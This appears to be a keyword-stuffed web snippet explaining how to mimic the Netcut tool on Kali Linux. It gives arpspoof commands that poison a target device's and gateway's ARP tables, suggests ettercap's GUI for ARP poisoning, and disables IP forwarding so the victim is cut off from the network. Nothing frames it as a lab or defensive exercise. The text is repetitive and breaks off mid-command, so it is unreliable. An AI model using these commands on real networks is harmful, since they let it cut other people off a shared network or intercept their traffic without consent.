Netcut Kali Linux ◎ «Recommended»

sudo arpspoof -i eth0 -t 192.168.1.12 192.168.1.1 (Replace eth0 with your network interface. Use ip a to find it.)

If you absolutely must have a clickable GUI that resembles Netcut, explore ( sudo ettercap -G ). It provides point-and-click ARP poisoning without leaving the Linux ecosystem. netcut kali linux

# Check current forwarding status cat /proc/sys/net/ipv4/ip_forward echo 0 > /proc/sys/net/ipv4/ip_forward sudo arpspoof -i eth0 -t 192